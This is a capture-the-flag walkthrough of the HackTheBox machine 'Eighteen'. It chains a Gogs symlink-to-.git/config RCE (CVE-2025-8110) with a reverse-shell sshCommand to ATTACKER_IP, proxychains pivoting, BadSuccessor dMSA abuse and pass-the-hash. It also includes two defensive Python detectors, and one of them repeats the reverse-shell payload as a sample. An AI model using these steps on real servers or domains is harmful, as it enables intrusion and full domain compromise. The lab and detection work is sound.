Eighteen.
Hard · Windows · Active Directory · CVE-2025-8110 · BadSuccessor · dMSA Abuse · HackTheBox
Hard Windows Active Directory machine built around a 2025 Gogs vulnerability (CVE-2025-8110) for initial access, followed by BadSuccessor, a 2025 AD technique that abuses Delegated Managed Service Accounts (dMSAs) on Windows Server 2025 domain controllers to inherit the built-in Administrator's privileges and keys. Every AD interaction is pivoted through a Squid proxy with proxychains, and VirtualBox's guest time sync breaks relative faketime offsets, so the Kerberos clock skew is handled with an absolute timestamp.
01 Enumeration

A full TCP scan shows SSH, a Gogs instance on port 80 and a Squid proxy on port 3128 open. Kerberos, LDAP and SMB report as filtered (firewalled, not closed): the AD services live on the internal DC and are reachable only after pivoting.

nmap
$ nmap -sCV -p- --min-rate 5000 -oN nmap/full.txt TARGET_IP
22/tcp   open     ssh
80/tcp   open     http          Gogs
3128/tcp open     http-proxy    Squid http proxy
88/tcp   filtered kerberos-sec
389/tcp  filtered ldap
445/tcp  filtered microsoft-ds
pivot point: port 3128 is a Squid HTTP proxy. The AD ports (88, 389, 445) are reachable only through it, so every AD tool runs under proxychains, either with Squid configured as an `http` proxy (proxychains speaks HTTP CONNECT) or through an SSH tunnel from the foothold host (section 03).

Fingerprint the Gogs version (it is printed in the page footer), register an account (registration is open) and look through the repositories. The AD credentials sit in a commit of an internal repo, so read the history (`git log -p` on a clone) rather than only the current tree.

Gogs fingerprint + cred discovery
$ curl -s http://TARGET_IP/ | grep -i version
Gogs 0.13.1
# register an account, browse repos → commit history reveals:
#   adam.scott / S3cur3P@ss!
Gogs 0.13.1: vulnerable to CVE-2025-8110, an authenticated RCE in which `core.sshCommand` is written into a server-side `.git/config` and then executed by the server's own git process (details in the next section).
02 Foothold — CVE-2025-8110 (Gogs RCE)

Gogs 0.13.1 is vulnerable to CVE-2025-8110: an authenticated user can get a command executed as the Gogs service user by landing attacker-controlled content in a `.git/config` that the server's own git process reads. The push itself is not the delivery mechanism. `core.sshCommand` is honoured by whichever git process performs the operation, and `.git/config` is untracked repository metadata that a push never transmits, so a malicious config in the attacker's clone only runs the payload on the attacker's machine. The symlink is the delivery mechanism: commit a symlink that points at `.git/config`, push it normally, then edit that file through the Gogs web editor. Gogs applies web edits in a temporary server-side clone, the write follows the symlink into that clone's `.git/config`, and the push Gogs then makes from the clone executes the injected `sshCommand`, because the same config also rewrites `remote.origin.url` to an `ssh://` URL.

CVE-2025-8110 — sshCommand injection via symlinked .git/config
# set up listener
$ nc -lvnp 4444

# repo containing a symlink that resolves to .git/config inside any clone of it
$ git init pwn && cd pwn
$ ln -s .git/config evil
$ git add -A && git commit -m "init"
$ git remote add origin http://TARGET_IP/adam.scott/pwn.git
$ git push origin master

# in the Gogs web UI, open "evil" in the file editor and replace its contents with
# (the host in the ssh:// URL is irrelevant; sshCommand runs before any connection):
[core]
    repositoryformatversion = 0
    sshCommand = bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
[remote "origin"]
    url = ssh://git@TARGET_IP/adam.scott/pwn.git
    fetch = +refs/heads/*:refs/remotes/origin/*
# commit the edit → Gogs pushes from its temporary clone → sshCommand executes

shell as git service user received on listener
why the remote must be ssh://: git consults core.sshCommand only when it opens an SSH transport. The temporary clone's origin is a local filesystem path, so without also rewriting remote.origin.url the injected key is never read. Whether your own push of the symlink went over HTTP or SSH makes no difference; everything that matters runs on the server.
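The server-side artefacts of this technique are easy to hunt for, which is the check anyone running Gogs (or triaging a compromised instance) wants. The following is an added example, not code from this writeup or from Gogs: a small reader for git's INI dialect that flags the config keys which make git execute something (`core.sshCommand`, `core.hooksPath`, `core.fsmonitor`, `core.gitProxy`, `remote.*.uploadpack`/`receivepack`) and any remote URL that would select the SSH transport, plus a walk for working-tree symlinks that resolve into `.git/`. The repository layout and the injected config it scans are constructed inline in a temporary directory; no assumption is made about where a real Gogs install keeps its repositories.

```python
"""Hunt for sshCommand-style injection in git repositories on disk.

Added example (not from the writeup or from Gogs). Parses git's INI dialect
with a small reader of its own and flags config keys that make git execute a
command, remote URLs that select the SSH transport, and working-tree symlinks
that resolve into .git/. The repository it scans is constructed inline.
"""
import os
import re
import tempfile

# Keys whose value is a command or a path git will execute (git treats key
# names case-insensitively, so everything is compared lower-cased).
EXEC_KEYS = {"core.sshcommand", "core.hookspath", "core.fsmonitor", "core.gitproxy"}
# Per-remote equivalents: remote.<name>.uploadpack / receivepack
EXEC_REMOTE_KEYS = {"uploadpack", "receivepack"}

_SECTION = re.compile(r'^\[\s*([A-Za-z0-9.-]+)(?:\s+"((?:[^"\\]|\\.)*)")?\s*\]$')
_KV = re.compile(r'^([A-Za-z][A-Za-z0-9-]*)\s*(?:=\s*(.*))?$')


def parse_git_config(text):
    """Return (key, value) pairs in file order, e.g. ('remote.origin.url', '...')."""
    entries, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # full-line comments only
            continue
        m = _SECTION.match(line)
        if m:
            section = m.group(1).lower() + (f".{m.group(2)}" if m.group(2) is not None else "")
            continue
        m = _KV.match(line)
        if m and section is not None:
            value = (m.group(2) if m.group(2) is not None else "true").strip().strip('"')
            entries.append((f"{section}.{m.group(1).lower()}", value))
    return entries


def uses_ssh_transport(url):
    """True when git would open an SSH connection for this URL (and so read core.sshCommand)."""
    if url.startswith(("ssh://", "git+ssh://", "ssh+git://")):
        return True
    if "://" in url or url.startswith(("/", ".", "~")):
        return False
    colon, slash = url.find(":"), url.find("/")
    return colon > 1 and (slash == -1 or colon < slash)   # scp-like user@host:path


def find_dangerous(entries):
    hits = []
    for key, value in entries:
        parts = key.split(".")
        if key in EXEC_KEYS:
            hits.append((key, value))
        elif parts[0] == "remote" and len(parts) == 3:
            if parts[2] in EXEC_REMOTE_KEYS or (parts[2] == "url" and uses_ssh_transport(value)):
                hits.append((key, value))
    return hits


def find_dotgit_symlinks(worktree):
    """Symlinks anywhere in the working tree whose target resolves inside .git/."""
    git_dir = os.path.realpath(os.path.join(worktree, ".git"))
    hits = []
    for root, dirs, files in os.walk(worktree):
        dirs[:] = [d for d in dirs if d != ".git"]
        for name in dirs + files:
            path = os.path.join(root, name)
            if os.path.islink(path):
                target = os.path.realpath(path)
                if target == git_dir or target.startswith(git_dir + os.sep):
                    hits.append((os.path.relpath(path, worktree), os.readlink(path)))
    return hits


def scan_worktree(worktree):
    with open(os.path.join(worktree, ".git", "config")) as fh:
        entries = parse_git_config(fh.read())
    return {"config": find_dangerous(entries), "symlinks": find_dotgit_symlinks(worktree)}


# Constructed sample: what a Gogs temporary clone looks like after the attack.
INJECTED_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tsshCommand = bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
[remote "origin"]
\turl = ssh://git@TARGET_IP/adam.scott/pwn.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
"""


def build_demo_tree():
    """Create the sample layout in a temp dir: symlink 'evil' -> .git/config plus the injected config."""
    root = tempfile.mkdtemp(prefix="gogs-scan-")
    os.mkdir(os.path.join(root, ".git"))
    with open(os.path.join(root, ".git", "config"), "w") as fh:
        fh.write(INJECTED_CONFIG)
    with open(os.path.join(root, "README.md"), "w") as fh:
        fh.write("benign\n")
    os.symlink(".git/config", os.path.join(root, "evil"))
    return root


if __name__ == "__main__":
    result = scan_worktree(build_demo_tree())
    for key, value in result["config"]:
        print(f"[config]  {key} = {value}")
    for link, target in result["symlinks"]:
        print(f"[symlink] {link} -> {target}")
```

Point `scan_worktree` at each repository a Gogs server has checked out (its temporary clones) and at its bare repositories' `config` files; a bare repo's config with `sshCommand` or a non-local origin is as suspicious as a clone's. The symlink check is the pre-compromise indicator: a tracked symlink into `.git/` has no legitimate purpose.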
03 Pivot Setup — Proxychains through Squid

AD ports are only reachable from inside. Two pivots are available: the Squid proxy on port 3128, which proxychains can use directly as an HTTP CONNECT proxy, or a SOCKS tunnel over SSH through the foothold host. Either way every AD tool is launched under proxychains.

SSH SOCKS tunnel + proxychains config
# option A: use Squid itself; proxychains speaks HTTP CONNECT
# /etc/proxychains4.conf
http TARGET_IP 3128

# option B: SOCKS over SSH through the foothold host. Gogs' own authorized_keys
# entries carry no-port-forwarding, so this needs a key you add from the shell
# (append to ~git/.ssh/authorized_keys) or a tunnel tool such as chisel.
$ ssh -D 1080 -N git@TARGET_IP
# /etc/proxychains4.conf
socks5 127.0.0.1 1080

# all AD tools now run via proxychains; --dns-tcp because proxychains cannot carry UDP DNS
$ proxychains bloodhound-python -u adam.scott -p 'S3cur3P@ss!' -d eighteen.htb -ns DC_IP --dns-tcp -c All
proxychains caveats: Squid has to permit CONNECT to ports other than 443 (its stock SSL_ports ACL refuses them, so a 403 on CONNECT means you need the SSH route); proxychains only carries TCP, so UDP silently fails: pass --dns-tcp to bloodhound-python and read the DC clock over SMB rather than with ntpdate; and the extra hop makes default timeouts fire early, so raise them (--timeout or -T, where a tool has one) before concluding a port is closed.
04 User Flag

With a shell as the git service user, enumerate home directories. adam.scott's home contains user.txt.

user flag
$ ls /home/
adam.scott
$ cat /home/adam.scott/user.txt
user flag ✓
05 Root — BadSuccessor (dMSA Abuse)

BadSuccessor (disclosed May 2025, Akamai) abuses Delegated Managed Service Accounts, a Windows Server 2025 feature for migrating a legacy service account to a managed one. A dMSA object carries msDS-ManagedAccountPrecededByLink (the DN of the account it replaces) and msDS-DelegatedMSAState (2 = migration complete). Nothing checks whether the caller has any rights over the account being "replaced": any principal that can create a dMSA, i.e. holds CreateChild on some OU or container, can point the link at any account, including the built-in Administrator. When the dMSA then authenticates, the KDC builds its PAC with the superseded account's SID and group memberships, and the TGT carries a KERB-DMSA-KEY-PACKAGE containing the superseded account's keys, so the attacker ends up with both Domain Admin access and Administrator's NT hash. A single Windows Server 2025 DC in the domain is enough; dMSAs need not be in use anywhere.

BloodHound — find CreateChild rights
$ proxychains bloodhound-python -u adam.scott -p 'S3cur3P@ss!' -d eighteen.htb -ns DC_IP --dns-tcp -c All --zip
adam.scott →(CreateChild)→ OU=ServiceAccounts,DC=eighteen,DC=htb
only CreateChild needed: BadSuccessor needs no rights on the target account, only CreateChild on any OU or container (generic, or specifically for the msDS-DelegatedManagedServiceAccount class) plus a Windows Server 2025 DC in the domain. Delegated OU-creation rights are common in real environments, so audit this ACE in any domain that has started deploying 2025 DCs. BloodHound has no dMSA-specific edge; look at CreateChild, GenericAll, WriteDACL and Owns on OUs.
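For the defender side of this section: the same two attributes that make the attack work are what to hunt for, both in a directory snapshot and in the DC's Security log. The following is an added example, not code from this writeup or from BloodHound/bloodyAD. The LDAP entries and 5136/5137 events it scans are constructed stand-ins for what an LDAP search (for instance ldap3 through proxychains) and a Security-log export return; the attribute, class and event field names are the real ones. The event half assumes a SACL on the OU that audits object creation and writes to those attributes, which is not on by default.

```python
"""Find BadSuccessor-style dMSA links and the directory events that create them.

Added example, not part of the writeup or of BloodHound/bloodyAD. The LDAP
entries and Security-log events below are constructed stand-ins; attribute,
class and event field names are the real ones. Auditing the events needs a
SACL on the OU (object creation + writes to the two attributes), assumed here.
"""
DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"
LINK_ATTR = "msDS-ManagedAccountPrecededByLink"   # dMSA -> account it "replaces"
STATE_ATTR = "msDS-DelegatedMSAState"             # 2 = migration completed
MIGRATION_COMPLETE = 2

# --- constructed directory snapshot ------------------------------------------
ENTRIES = [
    {"dn": "CN=Administrator,CN=Users,DC=eighteen,DC=htb",
     "objectClass": ["user"], "adminCount": 1},
    {"dn": "CN=svc-web,OU=ServiceAccounts,DC=eighteen,DC=htb",
     "objectClass": ["user"], "adminCount": 0},
    # a legitimate-looking migration: service account -> dMSA
    {"dn": "CN=svc-web-dmsa,OU=ServiceAccounts,DC=eighteen,DC=htb",
     "objectClass": ["msDS-GroupManagedServiceAccount", DMSA_CLASS],
     LINK_ATTR: "CN=svc-web,OU=ServiceAccounts,DC=eighteen,DC=htb",
     STATE_ATTR: 2},
    # the attack: a fresh dMSA linked to the built-in Administrator
    {"dn": "CN=svc-evil,OU=ServiceAccounts,DC=eighteen,DC=htb",
     "objectClass": ["msDS-GroupManagedServiceAccount", DMSA_CLASS],
     LINK_ATTR: "CN=Administrator,CN=Users,DC=eighteen,DC=htb",
     STATE_ATTR: 2},
]


def find_bad_successors(entries):
    """Every dMSA with a predecessor link, rated by how bad that link is.

    adminCount=1 marks members of protected groups (set by SDProp); extend the
    test with your own tier-0 list, since not every sensitive account is protected.
    """
    by_dn = {e["dn"].lower(): e for e in entries}
    findings = []
    for e in entries:
        if DMSA_CLASS not in e.get("objectClass", []) or not e.get(LINK_ATTR):
            continue
        target = by_dn.get(e[LINK_ATTR].lower(), {})
        privileged = target.get("adminCount") == 1
        state = e.get(STATE_ATTR, 0)
        if privileged and state == MIGRATION_COMPLETE:
            severity = "high"      # KDC will hand out the target's SIDs and keys
        elif privileged:
            severity = "medium"    # one attribute write away from 'high'
        else:
            severity = "info"
        findings.append({"dmsa": e["dn"], "target": e[LINK_ATTR],
                         "state": state, "severity": severity})
    return findings


# --- constructed Security-log events (5137 = object created, 5136 = attribute modified)
EVENTS = [
    {"EventID": 5137, "SubjectUserName": "adam.scott", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=svc-evil,OU=ServiceAccounts,DC=eighteen,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "adam.scott", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=svc-evil,OU=ServiceAccounts,DC=eighteen,DC=htb",
     "AttributeLDAPDisplayName": LINK_ATTR,
     "AttributeValue": "CN=Administrator,CN=Users,DC=eighteen,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "adam.scott", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=svc-evil,OU=ServiceAccounts,DC=eighteen,DC=htb",
     "AttributeLDAPDisplayName": STATE_ATTR, "AttributeValue": "2"},
    {"EventID": 5136, "SubjectUserName": "adam.scott", "ObjectClass": "user",
     "ObjectDN": "CN=adam.scott,CN=Users,DC=eighteen,DC=htb",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "noise"},
]

WATCHED_ATTRS = {LINK_ATTR.lower(), STATE_ATTR.lower()}


def scan_directory_events(events, trusted=()):
    """Alert on dMSA creation and on writes to the two BadSuccessor attributes
    by anyone outside the set of principals expected to run migrations."""
    trusted = {t.lower() for t in trusted}
    alerts = []
    for ev in events:
        who = ev.get("SubjectUserName", "?")
        if who.lower() in trusted:
            continue
        if ev.get("EventID") == 5137 and ev.get("ObjectClass") == DMSA_CLASS:
            alerts.append(f"{who} created dMSA {ev['ObjectDN']}")
        elif ev.get("EventID") == 5136 and ev.get("AttributeLDAPDisplayName", "").lower() in WATCHED_ATTRS:
            alerts.append(f"{who} set {ev['AttributeLDAPDisplayName']}={ev.get('AttributeValue')} on {ev['ObjectDN']}")
    return alerts


if __name__ == "__main__":
    for f in find_bad_successors(ENTRIES):
        print(f"[{f['severity']:6}] {f['dmsa']} -> {f['target']} (state={f['state']})")
    for a in scan_directory_events(EVENTS, trusted=("svc-migration",)):
        print("[alert]", a)
```

The snapshot check catches a dMSA that already exists; the event check catches the creation and the two attribute writes as they happen, which is the only place the attacker's own identity (adam.scott) appears, because everything after that is done as the dMSA.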
06 Clock Skew — VirtualBox Absolute Faketime

Kerberos rejects requests whose timestamp is more than five minutes off the DC's clock, and in this VM the guest clock cannot simply be set to match: VirtualBox's guest-additions time sync keeps pulling it back to the host's time. A relative faketime offset such as +7h is added to whatever the system clock says at each call, so it lands on the wrong time again as soon as the clock is reset. An absolute FAKETIME value does not depend on the guest clock at all. Two caveats: the plain absolute form freezes the fake clock at that instant, so if a tool complains about repeated authenticators or ticket times use the start-at form `@2026-05-15 10:30:00`, which advances from that point; and if you control the hypervisor the cleaner fix is to stop the sync (on the host: `VBoxManage setextradata "<vm>" "VBoxInternal/Devices/VMMDev/0/Config/GetHostTimeDisabled" 1`) and set the guest clock once.

get DC time → apply absolute faketime
# read the DC's clock over SMB (TCP, so it goes through proxychains; ntpdate is UDP and will not)
$ proxychains net time -S DC_IP
Fri May 15 10:30:00 2026

# pin the fake clock to that value for this shell; VirtualBox resetting the guest clock no longer matters
$ export FAKETIME="2026-05-15 10:30:00"
$ export LD_PRELOAD=/usr/lib/x86_64-linux-gnu/faketime/libfaketime.so.1
$ export FAKETIME_NO_CACHE=1
# (or wrap individual commands instead: faketime '2026-05-15 10:30:00' <cmd>, as in the next section)
relative vs absolute faketime: +7h is added to the system clock at every call, so if VirtualBox resets that clock between calls the fake time moves with it. "2026-05-15 10:30:00" is fixed regardless of the system clock, but it is also frozen; "@2026-05-15 10:30:00" starts there and keeps ticking, which is the safer choice for a session of several Kerberos exchanges.
07 dMSA Creation → Administrator NT Hash → Shell

With the clock pinned, create a dMSA in the OU where adam.scott holds CreateChild, set its msDS-ManagedAccountPrecededByLink to Administrator's DN and msDS-DelegatedMSAState to 2, and make adam.scott a principal allowed to retrieve its managed password (the creator owns the new object, so these writes are permitted). Reading msDS-ManagedPassword then yields the dMSA's own key, not Administrator's. Authenticating as the dMSA with that key returns a TGT whose PAC already carries Administrator's SIDs (usable directly with Kerberos) and whose KERB-DMSA-KEY-PACKAGE carries Administrator's keys, which is where the NT hash for pass-the-hash comes from.

create dMSA superseding Administrator
$ proxychains faketime '2026-05-15 10:30:00' python3 -m bloodyAD \
    --host DC_IP -d eighteen.htb \
    -u adam.scott -p 'S3cur3P@ss!' \
    add dMSA svc-evil \
    --ou "OU=ServiceAccounts,DC=eighteen,DC=htb" \
    --supersede "CN=Administrator,CN=Users,DC=eighteen,DC=htb"
[+] dMSA svc-evil created
retrieve managed password → NT hash
# the dMSA's own managed password, decoded to its NT hash
$ proxychains faketime '2026-05-15 10:30:00' python3 -m bloodyAD \
    --host DC_IP -d eighteen.htb \
    -u adam.scott -p 'S3cur3P@ss!' \
    get object "svc-evil$" --attr msDS-ManagedPassword
msDS-ManagedPassword.NT: <dmsa_nt_hash>

# Administrator's keys come from a TGT issued to the dMSA: the KDC packs the
# superseded account's keys into KERB-DMSA-KEY-PACKAGE. Request the TGT as
# svc-evil$ with a BadSuccessor-aware tool (Rubeus asktgt /dmsa on Windows;
# the Linux implementations that followed the disclosure, bloodyAD's included,
# decode the same package; check the installed version's help for the exact
# subcommand) and read the hash out of the package:
Administrator NT hash: <administrator_nt_hash>
PTH → evil-winrm → root flag
$ proxychains faketime '2026-05-15 10:30:00' evil-winrm \
    -i DC_IP -u Administrator -H <NT_HASH>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
root flag ✓
permission errors: bloodyAD runs on the attacking host, so Windows integrity levels play no part here. If the dMSA creation fails despite the BloodHound edge, check that the CreateChild ACE is on the OU you are targeting and that it covers the msDS-DelegatedManagedServiceAccount class (a class-restricted CreateChild looks the same in BloodHound), and that the clock is still pinned: a KRB_AP_ERR_SKEW surfaces through proxychains as a plain bind failure. BadSuccessor support in bloodyAD is recent, so confirm the exact subcommand and flags with `python3 -m bloodyAD add --help` on the installed version.
08 Full Attack Chain
attack chain summary
Gogs 0.13.1 (port 80, open registration)
  │
  ▼
Register account → browse repos → commit history → adam.scott:S3cur3P@ss!
  │
  ▼
CVE-2025-8110 (symlink → .git/config; sshCommand + ssh:// remote written via web editor)
RCE as git service user → user.txt ✓
  │
  ▼
Squid 3128 (proxychains http) or SSH SOCKS tunnel → internal AD reachable
bloodhound-python → adam.scott CreateChild on OU=ServiceAccounts
  │
  ▼
BadSuccessor (absolute faketime, VirtualBox workaround)
bloodyAD add dMSA svc-evil, link → Administrator, state = 2
dMSA key → TGT for svc-evil$ → Administrator SIDs in PAC + keys in KERB-DMSA-KEY-PACKAGE
evil-winrm PTH → root.txt ✓
key takeaways:
· CVE-2025-8110 — the Gogs symlink-to-.git/config write needs nothing but a valid account and the web editor; check the Gogs version on any engagement, and audit repository configs for sshCommand and non-local remotes
· BadSuccessor — needs only CreateChild on one OU, no rights on the victim; audit that ACE in any domain with a Windows Server 2025 DC and alert on dMSA creation and writes to msDS-ManagedAccountPrecededByLink / msDS-DelegatedMSAState (events 5137/5136)
· VirtualBox faketime — relative offsets (+7h) follow a clock that guest-additions keeps resetting; pin an absolute timestamp (or the @-prefixed start-at form) instead, or disable the sync from the host
· Proxychains latency — increase tool timeouts when pivoting; false connection failures are common at default timeouts